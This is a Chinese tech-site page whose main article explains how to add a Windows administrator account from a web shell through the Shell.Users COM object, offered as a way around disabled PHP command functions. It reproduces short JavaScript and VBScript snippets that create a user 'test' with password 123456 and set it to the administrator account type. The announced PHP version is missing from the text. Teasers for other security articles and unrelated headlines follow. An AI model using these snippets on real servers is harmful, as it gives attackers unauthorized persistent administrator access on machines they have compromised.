你知道php版用户权限如何加管理账号吗?
09年的时候 LCX 写出了 js版 和vbs 版的shell.users 加管理员帐号的方法,后来我就想把它改成PHP 版,由于对代码分析得不够准确,所以到最近才写出来。
当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen
以及wscript.shell 组建被禁用的情况下,这也许是一个机会。
代码如下:
对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。
下面是 LCX 的代码
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
hi.baidu.com/南拳daddy
网络受到arp攻击怎么办?下面七种简单方法可以帮你快速解决
在局域网内,ARP攻击依然占有很高比例。众所周知,ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。ARP协议的基础就是信任局域网内所有的人,那么就很容易实现在以太
详情2018-01-23 18:20:29责编:llp 来源:驱动管家microsoft excel内存破坏、执行任意指令怎么办?
受影响系统: Microsoft Excel Viewer 2003 Microsoft Excel 2007 Microsoft Excel 2003 SP2 Microsoft Excel 2002 SP3 Microsoft Excel 2000 SP3 Microsoft Office 2004 for Mac 描述: ------------------------------------------------------
详情2018-01-10 14:59:53责编:llp 来源:驱动管家cmos是什么?丢失cmos密码后怎么破解cmos密码?
CMOS是微机主板上的一块可读写的RAM芯片,用来保存当前系统的硬件配置和用户对某些参数的设定。CMOS可由主板的电池供电,即使系统掉电,信息也不会丢失。CMOS RAM本身只是一块存储器,只有数据保存功能,而对CMO
详情2018-01-30 17:27:43责编:llp 来源:驱动管家大部分被黑网站根源在于该网站有隐藏的后门脚本
你的网站为什么被黑了?经过网络安全公司Sucuri的安全专家的调查,有大约68%的被黑网站存在着隐藏的后门backdoor脚本。这些后门脚本就是为入侵者提供的秘密通道,即使管理员改变安全口令或更新了安全补丁,只要没
详情2018-01-19 14:07:30责编:llp 来源:驱动管家第三个世界上最流行的服务器:iis服务器文件和文件夹被泄漏
IIS是有微软使用微软windows功能扩展模块创建的一套web服务器应用程序,是世界上第三个最流行的服务器。漏洞描述:漏洞研究小组发现了一个微软IIS的漏洞,攻击者可以利用一个包含 "~ "的get请求,来让服务器上的文件和
详情2018-02-02 11:21:20责编:llp 来源:驱动管家Google的功能:利用搜索引擎进行傻瓜入侵测试
2004年在拉斯维加斯举行的BlackHat大会上,有两位安全专家分别作了名为You found that on google? 和google attacks 的主题演讲。经过安全焦点论坛原版主WLJ翻译整理后,个人觉得有必要补充完善一些细节部
详情2018-03-08 10:36:32责编:llp 来源:驱动管家关闭445端口的方法 怎么关闭445端口?
近日有多个高校发布了关于连接校园网的电脑大面积中勒索病毒的消息,这种病毒致使许多高校毕业生的毕业论文(设计)被锁。受害机器的磁盘文件会被篡改为相应的后缀,图片、文档、视频、压缩包等各类资料都无法正常打
详情2018-01-07 14:19:55责编:llp 来源:驱动管家密钥管理 怎么管理加密密钥?
“传输中的数据”密钥管理系统在加密数据“休息”的时候不起作用有两个原因。第一个原因是传输中的数据加密没有密钥存储的概念。一旦你从一个密钥转移到另一个密钥,旧的密钥就不再需要了。然而,在加密存储的数据时,密钥是正常变化的。旧的密钥必须要保留,否则使
详情2018-01-17 14:09:50责编:llp 来源:驱动管家检查服务器病毒的操作步骤 服务器中病毒怎么办?
随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民服务,银行和证券机构也都开始依托互联网来进行金融和股
详情2018-03-06 15:41:02责编:llp 来源:驱动管家入侵网站有哪些手段?怎么避免发生网站入侵?
目前网络上的病毒、木马日益增多,更为严重的是有一些为谋取私人利益的间谍软件、广告程序都可能对我们的计算机造成危害,甚至有的软件被人利用,还可达到跟木马入侵的同样效果。因此你作为一个精明的电脑用户,
详情2018-01-28 14:27:26责编:llp 来源:驱动管家
- Windows10禁用驱动程序强制签名的方法
- 用会声会影软件进行视频剪辑的方法步骤详解
- 使用二维码也能下载软件?怎么利用二维码下载软件
- cgm格式文件是什么文件?怎么在电脑上打开cgm文件
- desktop.ini格式文件的介绍 desktop.ini文件怎么删除
- 美国公司推出的GrayKey工具也能破解iPhone 甚至是iPhone X
- 特斯拉首席会计官布兰德已经离职 特斯拉股价下跌了1.06%
- 魅族宣布:将于3月21日在北京举办魅蓝E3新品发布会
- 电脑在开机的过程中报错了有哪些方法解决
- Spuninst.exe是什么文件?Spuninst.exe进程能不能删除
- lumia 830有哪几种颜色?lumia 830性价比如何?
- lumia 1020常识 lumia 1020常见问题的解决方法
- 四层交换机指的是什么 四层交换机的详细介绍
- 支付宝密码被锁定怎么办?试试这个方法
- Lighttpd在处理意外情况时存在漏洞,导致敏感信息泄露
- logparser用法介绍 logparser怎么用?
- Win10 dolby音效驱动安装方法
- 用ppt编辑图片的时候怎么设置隐藏窗格
- 电脑的开始菜单摆放顺序可以修改吗?怎么修改
- GTX1080Ti超频会怎么样 GTX1080Ti上水冷散热器效果测试